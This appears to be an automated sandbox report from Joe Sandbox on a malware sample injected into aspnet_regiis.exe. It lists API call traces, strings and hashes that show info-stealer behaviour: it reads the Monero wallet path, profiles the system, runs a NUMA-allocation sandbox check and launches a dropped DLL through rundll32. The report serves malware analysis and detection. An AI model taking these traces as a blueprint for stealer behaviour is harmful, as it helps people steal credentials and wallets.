                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                                                                                                                                              • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                                                                                                                                                                              • API String ID: 3225020163-4244082812
                                                                                                                                                                              • Opcode ID: ee9958845dd4d4894ba70bba8251ad6d25e474f9de8cfc587f464c9f23c6b5be
                                                                                                                                                                              • Instruction ID: 6ae3083c7c350f0c423e2b48c665fdb1e5785794ba3694783710f79485e1c9e6
                                                                                                                                                                              • Opcode Fuzzy Hash: ee9958845dd4d4894ba70bba8251ad6d25e474f9de8cfc587f464c9f23c6b5be
                                                                                                                                                                              • Instruction Fuzzy Hash: 8FF05E75A80314BFFB109B91DC4FFAA7B7CEB44B05F5405A4B702B6081EBB0AA909620
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,02A13E95,Windows: ,02A368A0), ref: 02A10B44
                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02A10B4B
                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,02A36888,?,?,?,02A13E95,Windows: ,02A368A0), ref: 02A10B79
                                                                                                                                                                              • RegQueryValueExA.KERNEL32(02A36888,00000000,00000000,00000000,000000FF,?,?,?,02A13E95,Windows: ,02A368A0), ref: 02A10B95
                                                                                                                                                                              • RegCloseKey.ADVAPI32(02A36888,?,?,?,02A13E95,Windows: ,02A368A0), ref: 02A10B9E
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                                                                                                                                              • String ID: Windows 11
                                                                                                                                                                              • API String ID: 3225020163-2517555085
                                                                                                                                                                              • Opcode ID: 538f7f993ecda16fff5fb6787337fce37fd667ec957587ab77ff03d5191aab6e
                                                                                                                                                                              • Instruction ID: 7563d0b06339d3b3078d16e40a14f1a3b212cba9e400800d322a8e1bb413d73a
                                                                                                                                                                              • Opcode Fuzzy Hash: 538f7f993ecda16fff5fb6787337fce37fd667ec957587ab77ff03d5191aab6e
                                                                                                                                                                              • Instruction Fuzzy Hash: 15F04471A80314FBEB105B91DC4AF6A7A7DEB48715F5405A4FB01A5080EB70DAE09B10
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,02A10C1B,02A10B58,?,?,?,02A13E95,Windows: ,02A368A0), ref: 02A10BBD
                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02A10BC4
                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,02A36888,?,?,?,02A10C1B,02A10B58,?,?,?,02A13E95,Windows: ,02A368A0), ref: 02A10BE2
                                                                                                                                                                              • RegQueryValueExA.KERNEL32(02A36888,CurrentBuildNumber,00000000,00000000,00000000,000000FF,?,?,?,02A10C1B,02A10B58,?,?,?,02A13E95,Windows: ), ref: 02A10BFD
                                                                                                                                                                              • RegCloseKey.ADVAPI32(02A36888,?,?,?,02A10C1B,02A10B58,?,?,?,02A13E95,Windows: ,02A368A0), ref: 02A10C06
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                                                                                                                                              • String ID: CurrentBuildNumber
                                                                                                                                                                              • API String ID: 3225020163-1022791448
                                                                                                                                                                              • Opcode ID: 3e4a12973e32fd6888d99c31ff845cbf58d0b23367aa7166a0d4eb116a481069
                                                                                                                                                                              • Instruction ID: d632568c89971e9f68eaac92af1c51dd43b76215c9afb56e822151c86ac5d0ab
                                                                                                                                                                              • Opcode Fuzzy Hash: 3e4a12973e32fd6888d99c31ff845cbf58d0b23367aa7166a0d4eb116a481069
                                                                                                                                                                              • Instruction Fuzzy Hash: A6F03075A80314BBFB119F90DC4AFAF7A7DEB44B14F140654F601B5080EBB0DAA09B60
                                                                                                                                                                              APIs
                                                                                                                                                                              • _memset.LIBCMT ref: 02A156A4
                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000001,00000000,00020119,?,?,00000000,?), ref: 02A156C4
                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,000000FF), ref: 02A156EA
                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 02A156F6
                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 02A15725
                                                                                                                                                                              • lstrcat.KERNEL32(?), ref: 02A15738
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrcat$CloseOpenQueryValue_memset
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3891774339-0
                                                                                                                                                                              • Opcode ID: dcb2940165885763f4cffbaba2da3211a141e821cfd22832ebbe56f23acd5244
                                                                                                                                                                              • Instruction ID: 21d913b7c90113faac83a7aefbdbfa36e615d12ef335559ee9fa62c0952dbc0c
                                                                                                                                                                              • Opcode Fuzzy Hash: dcb2940165885763f4cffbaba2da3211a141e821cfd22832ebbe56f23acd5244
                                                                                                                                                                              • Instruction Fuzzy Hash: F7418E71C8022D9FCB14AF60ED85FE9777ABB18314F4009A9A509A3190EE709FE59F90
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,02A0E756,?,?,?), ref: 02A07FC7
                                                                                                                                                                              • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,02A0E756,?,?,?), ref: 02A07FDE
                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,02A0E756,?,?,?), ref: 02A07FF5
                                                                                                                                                                              • ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,02A0E756,?,?,?), ref: 02A0800C
                                                                                                                                                                              • LocalFree.KERNEL32(02A0ECBC,?,?,?,?,02A0E756,?,?,?), ref: 02A0802B
                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,02A0E756,?,?,?), ref: 02A08034
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2311089104-0
                                                                                                                                                                              • Opcode ID: a5f9efc8de67578db808a8e119cce9f21dbc9a26360264cf8e31f96f3714bfd9
                                                                                                                                                                              • Instruction ID: a4067cd614bb371f4c0cb034d0d6f53a3881d7ad8fe10130595d90e6e8a3aaa2
                                                                                                                                                                              • Opcode Fuzzy Hash: a5f9efc8de67578db808a8e119cce9f21dbc9a26360264cf8e31f96f3714bfd9
                                                                                                                                                                              • Instruction Fuzzy Hash: F0113070900214EFDF219FA4E8C8FAE7BB8EB48784F200A58F541E6180EB759791DB11
                                                                                                                                                                              APIs
                                                                                                                                                                              • __EH_prolog3_catch.LIBCMT ref: 02A1175E
                                                                                                                                                                              • CoCreateInstance.COMBASE(02A331B0,00000000,00000001,02A3AF60,?), ref: 02A11781
                                                                                                                                                                              • SysAllocString.OLEAUT32(?), ref: 02A1178E
                                                                                                                                                                              • _wtoi64.MSVCRT ref: 02A117C1
                                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 02A117DA
                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 02A117E1
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: String$Free$AllocCreateH_prolog3_catchInstance_wtoi64
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 181426013-0
                                                                                                                                                                              • Opcode ID: f2f64b2a160984ccefe32ee09f6635e226a4d70918fd72c8792a7e3e2af44a1b
                                                                                                                                                                              • Instruction ID: 890065482dad79ef81ba6b53ebedb1a2339d832b4590255f53d0441751fec0f2
                                                                                                                                                                              • Opcode Fuzzy Hash: f2f64b2a160984ccefe32ee09f6635e226a4d70918fd72c8792a7e3e2af44a1b
                                                                                                                                                                              • Instruction Fuzzy Hash: B8115B75D4424ADFCB019FE4CD88AAEBBB6BF48310F504469F20AE7250CF31994ACB50
                                                                                                                                                                              APIs
                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,001E5D70,00003000,00000004), ref: 02A010AA
                                                                                                                                                                              • _memset.LIBCMT ref: 02A010D0
                                                                                                                                                                              • VirtualFree.KERNEL32(00000000,001E5D70,00008000), ref: 02A010E6
                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,02A184CC), ref: 02A01100
                                                                                                                                                                              • VirtualAllocExNuma.KERNEL32(00000000), ref: 02A01107
                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 02A01112
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Virtual$AllocProcess$CurrentExitFreeNuma_memset
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1859398019-0
                                                                                                                                                                              • Opcode ID: b1ac6269581590f08497c4c85ca5ea95f6882be501a58cd91915de994e13ee12
                                                                                                                                                                              • Instruction ID: 522536f379611ac41fbdda5b0a9f8d3e5c826eae57647b3bd0593273713e5d9c
                                                                                                                                                                              • Opcode Fuzzy Hash: b1ac6269581590f08497c4c85ca5ea95f6882be501a58cd91915de994e13ee12
                                                                                                                                                                              • Instruction Fuzzy Hash: F6F0C272BC122077E22026753CDEFAB2A6C9B42F66F204414F308FB2C0DF65D81996B4
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                                • Part of subcall function 02A10609: lstrlen.KERNEL32(?,00000000,?,?,?,?,02A1709C,02A36C18,00000000,02A366CD,?,?,?,?,02A1858F), ref: 02A1061D
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcpy.KERNEL32(00000000,?), ref: 02A10645
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcat.KERNEL32(?,00000000), ref: 02A10650
                                                                                                                                                                                • Part of subcall function 02A1058D: lstrcpy.KERNEL32(00000000,?), ref: 02A105BD
                                                                                                                                                                                • Part of subcall function 02A11C4A: GetSystemTime.KERNEL32(?,02A36701,?), ref: 02A11C79
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcpy.KERNEL32(00000000,?), ref: 02A105F5
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcat.KERNEL32(?,?), ref: 02A105FF
                                                                                                                                                                              • ShellExecuteEx.SHELL32(?), ref: 02A12B84
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
                                                                                                                                                                              • String ID: "" $.dll$C:\ProgramData\$C:\Windows\system32\rundll32.exe
                                                                                                                                                                              • API String ID: 2215929589-2108736111
                                                                                                                                                                              • Opcode ID: 313dea26a475be0628c0d9fb62555a696187ee920ebbae2c94341e6aa221d057
                                                                                                                                                                              • Instruction ID: 94df2c19c44a382e72506c52a0b45a165d8bc3350688167b3407273eb6610c9a
                                                                                                                                                                              • Opcode Fuzzy Hash: 313dea26a475be0628c0d9fb62555a696187ee920ebbae2c94341e6aa221d057
                                                                                                                                                                              • Instruction Fuzzy Hash: AB71A732D80229ABDF11FFA5EA85ACDB7BABF04750F514161E910B7150DF70AE4A8F90
                                                                                                                                                                              APIs
                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 02A15E86
                                                                                                                                                                                • Part of subcall function 02A11DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 02A11DFD
                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 02A15EA3
                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 02A15EC2
                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 02A15ED6
                                                                                                                                                                              • lstrcat.KERNEL32(?), ref: 02A15EE9
                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 02A15EFD
                                                                                                                                                                              • lstrcat.KERNEL32(?), ref: 02A15F10
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                                • Part of subcall function 02A11D92: GetFileAttributesA.KERNEL32(?,?,?,02A0DA7F,?,?,?), ref: 02A11D99
                                                                                                                                                                                • Part of subcall function 02A15B0B: GetProcessHeap.KERNEL32(00000000,0098967F,?,?,?), ref: 02A15B30
                                                                                                                                                                                • Part of subcall function 02A15B0B: RtlAllocateHeap.NTDLL(00000000), ref: 02A15B37
                                                                                                                                                                                • Part of subcall function 02A15B0B: wsprintfA.USER32 ref: 02A15B50
                                                                                                                                                                                • Part of subcall function 02A15B0B: FindFirstFileA.KERNEL32(?,?), ref: 02A15B67
                                                                                                                                                                                • Part of subcall function 02A15B0B: StrCmpCA.SHLWAPI(?,02A36A98), ref: 02A15B88
                                                                                                                                                                                • Part of subcall function 02A15B0B: StrCmpCA.SHLWAPI(?,02A36A9C), ref: 02A15BA2
                                                                                                                                                                                • Part of subcall function 02A15B0B: wsprintfA.USER32 ref: 02A15BC9
                                                                                                                                                                                • Part of subcall function 02A15B0B: CopyFileA.KERNEL32(?,?,00000001), ref: 02A15C86
                                                                                                                                                                                • Part of subcall function 02A15B0B: DeleteFileA.KERNEL32(?), ref: 02A15CA9
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrcat$File$Heapwsprintf$AllocateAttributesCopyDeleteFindFirstFolderPathProcesslstrcpy
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3709078413-0
                                                                                                                                                                              • Opcode ID: 1f0d1a50fe06f840223989295d16fcd8e72cd007bebd3d60066bf6ca34287afa
                                                                                                                                                                              • Instruction ID: 7188cd4800b153d723a322acce7914749eeac51236de130d2540b546374666b9
                                                                                                                                                                              • Opcode Fuzzy Hash: 1f0d1a50fe06f840223989295d16fcd8e72cd007bebd3d60066bf6ca34287afa
                                                                                                                                                                              • Instruction Fuzzy Hash: 9551CDB5E4022C9BCB54DF64DC84ADDB7B9AB4C310F8449E5EA09E3250EA309BD98F54
                                                                                                                                                                              APIs
                                                                                                                                                                              • _memset.LIBCMT ref: 02A116CE
                                                                                                                                                                                • Part of subcall function 02A123D5: malloc.MSVCRT ref: 02A123DA
                                                                                                                                                                                • Part of subcall function 02A123D5: strncpy.MSVCRT ref: 02A123EB
                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 02A116F6
                                                                                                                                                                              • lstrcat.KERNEL32(?,02A36ECC), ref: 02A11713
                                                                                                                                                                              • GetCurrentHwProfileA.ADVAPI32(?), ref: 02A1169F
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrcat$CurrentProfile_memsetlstrcpymallocstrncpy
                                                                                                                                                                              • String ID: Unknown
                                                                                                                                                                              • API String ID: 2781187439-1654365787
                                                                                                                                                                              • Opcode ID: 54e131e2f1c7424d59f2c7f0bd8446c8ffda096d16e41ac75df0d28aa92fa598
                                                                                                                                                                              • Instruction ID: b721e853cf07306c9ed9fda5cfb4bfcd7c2e124a8e8a55dcaf3e0c058abed7a7
                                                                                                                                                                              • Opcode Fuzzy Hash: 54e131e2f1c7424d59f2c7f0bd8446c8ffda096d16e41ac75df0d28aa92fa598
                                                                                                                                                                              • Instruction Fuzzy Hash: BF113071E80228ABDB21EB64DD85BDDB3B9AF14710F4004A5AA49E7140DE74EAC98F54
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,02A36910,Display Resolution: ,02A368F4,00000000,User Name: ,02A368E4,00000000,Computer Name: ,02A368D0,AV: ,02A368C4,Install Date: ), ref: 02A11131
                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02A11138
                                                                                                                                                                              • GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 02A11154
                                                                                                                                                                              • wsprintfA.USER32 ref: 02A1117A
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                                                                                                                                                                              • String ID: %d MB
                                                                                                                                                                              • API String ID: 2922868504-2651807785
                                                                                                                                                                              • Opcode ID: ee87a33acdc787b711afca57e5d39c1be7d4b109ef1fac732d4e4eeb019b375e
                                                                                                                                                                              • Instruction ID: 901f0b62b3ca44fa7b7ead0433f3282f45398ad9b5d2a0e803cbbc2edf32afdb
                                                                                                                                                                              • Opcode Fuzzy Hash: ee87a33acdc787b711afca57e5d39c1be7d4b109ef1fac732d4e4eeb019b375e
                                                                                                                                                                              • Instruction Fuzzy Hash: 960186B1E40228ABE704DFB8DC45AEEB7BDEF04710F440569F606E7240DE74D9958B54
                                                                                                                                                                              APIs
                                                                                                                                                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,76E674F0,?,02A1CBEE,?,02A1CC7C,00000000,06400000,00000003,00000000,02A1757F,.exe,02A36C5C), ref: 02A1BC6E
                                                                                                                                                                              • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,76E674F0,?,02A1CBEE,?,02A1CC7C,00000000,06400000,00000003,00000000), ref: 02A1BCA6
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: File$CreatePointer
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2024441833-0
                                                                                                                                                                              • Opcode ID: 50caedc8e0f41d9e7cf91320b355c345e0530ab60828a494cb97fab9fead1807
                                                                                                                                                                              • Instruction ID: e43ad0a6c0c5cc0b18e4933a9e28fef517f92c0faaea8b13cf636d63664ccfcc
                                                                                                                                                                              • Opcode Fuzzy Hash: 50caedc8e0f41d9e7cf91320b355c345e0530ab60828a494cb97fab9fead1807
                                                                                                                                                                              • Instruction Fuzzy Hash: FB3181F0404704DFDB349F2588C4B26BAE8AB0536CF108E2EF19782591DB30A485CB35
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetSystemInfo.KERNEL32(?), ref: 6CA7C947
                                                                                                                                                                              • VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6CA7C969
                                                                                                                                                                              • GetSystemInfo.KERNEL32(?), ref: 6CA7C9A9
                                                                                                                                                                              • VirtualFree.KERNEL32(00000000,?,00008000), ref: 6CA7C9C8
                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6CA7C9E2
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680314610.000000006CA61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6CA60000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6ca60000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Virtual$AllocInfoSystem$Free
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 4191843772-0
                                                                                                                                                                              • Opcode ID: 979c81ae029a9f6d80c315e6b282edb2abe08e20c47fddf61252150fd2003764
                                                                                                                                                                              • Instruction ID: fbf43c1303c379c04e1527a57e21231a87513eb7241c92971a542dc7bda09e67
                                                                                                                                                                              • Opcode Fuzzy Hash: 979c81ae029a9f6d80c315e6b282edb2abe08e20c47fddf61252150fd2003764
                                                                                                                                                                              • Instruction Fuzzy Hash: DD212F357413156BD7989A68DC88BAE77B9FF4A708F50411DF90397640DB705C4487E4
                                                                                                                                                                              APIs
                                                                                                                                                                              • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04AE8
                                                                                                                                                                              • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04AEE
                                                                                                                                                                              • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04AF4
                                                                                                                                                                              • lstrlen.KERNEL32(000000FF,00000000,?), ref: 02A04B06
                                                                                                                                                                              • InternetCrackUrlA.WININET(000000FF,00000000), ref: 02A04B0E
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CrackInternetlstrlen
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1274457161-0
                                                                                                                                                                              • Opcode ID: 492e2d331f79ad50484c85e8296b4f7dbf4bb7a7a3683c87d9fc5f841f52a65a
                                                                                                                                                                              • Instruction ID: fac7907f8ad469d1cfb224d20337d5bf52323f26a871a993501c201aa7c4d6d8
                                                                                                                                                                              • Opcode Fuzzy Hash: 492e2d331f79ad50484c85e8296b4f7dbf4bb7a7a3683c87d9fc5f841f52a65a
                                                                                                                                                                              • Instruction Fuzzy Hash: D2011E31D00218ABCB149BA9EC45ADEBFB8AF55330F108616F925F72E0DB7496058B94
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,02A14252,Processor: ,[Hardware],02A36950,00000000,TimeZone: ,02A36940,00000000,Local Time: ,02A3692C), ref: 02A10F65
                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02A10F6C
                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,02A36888,?,?,?,02A14252,Processor: ,[Hardware],02A36950,00000000,TimeZone: ,02A36940,00000000,Local Time: ), ref: 02A10F8A
                                                                                                                                                                              • RegQueryValueExA.KERNEL32(02A36888,00000000,00000000,00000000,000000FF,?,?,?,02A14252,Processor: ,[Hardware],02A36950,00000000,TimeZone: ,02A36940,00000000), ref: 02A10FA6
                                                                                                                                                                              • RegCloseKey.ADVAPI32(02A36888,?,?,?,02A14252,Processor: ,[Hardware],02A36950,00000000,TimeZone: ,02A36940,00000000,Local Time: ,02A3692C,Keyboard Languages: ,02A36910), ref: 02A10FAF
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3225020163-0
                                                                                                                                                                              • Opcode ID: bddeea250821ca041d213655c51455dddf7744363902a002a17b170c32d8188c
                                                                                                                                                                              • Instruction ID: 561e4758322a16745df939e1c564d0baf49081787e1535986774b36f14628ec3
                                                                                                                                                                              • Opcode Fuzzy Hash: bddeea250821ca041d213655c51455dddf7744363902a002a17b170c32d8188c
                                                                                                                                                                              • Instruction Fuzzy Hash: 38F03076A80314FBEB105F91DC0AFAA7B7CEB48715F140694F602B5080E7B1DAA09B60
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetEnvironmentVariableA.KERNELBASE(C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,?,?,?,?,?,?,?,?,?,?,02A0DB0A), ref: 02A083F2
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                                • Part of subcall function 02A10549: lstrlen.KERNEL32(?,?,02A17174,02A366CF,02A366CE,?,?,?,?,02A1858F), ref: 02A1054F
                                                                                                                                                                                • Part of subcall function 02A10549: lstrcpy.KERNEL32(00000000,00000000), ref: 02A10581
                                                                                                                                                                                • Part of subcall function 02A10609: lstrlen.KERNEL32(?,00000000,?,?,?,?,02A1709C,02A36C18,00000000,02A366CD,?,?,?,?,02A1858F), ref: 02A1061D
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcpy.KERNEL32(00000000,?), ref: 02A10645
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcat.KERNEL32(?,00000000), ref: 02A10650
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcpy.KERNEL32(00000000,?), ref: 02A105F5
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcat.KERNEL32(?,?), ref: 02A105FF
                                                                                                                                                                                • Part of subcall function 02A1058D: lstrcpy.KERNEL32(00000000,?), ref: 02A105BD
                                                                                                                                                                              • SetEnvironmentVariableA.KERNEL32(?,02A37194,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,02A367C3,?,?,?,?,?,?,?,?,02A0DB0A), ref: 02A08447
                                                                                                                                                                              • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,02A0DB0A), ref: 02A0845B
                                                                                                                                                                              Strings
                                                                                                                                                                              • C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 02A083E6, 02A083EB, 02A08405
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
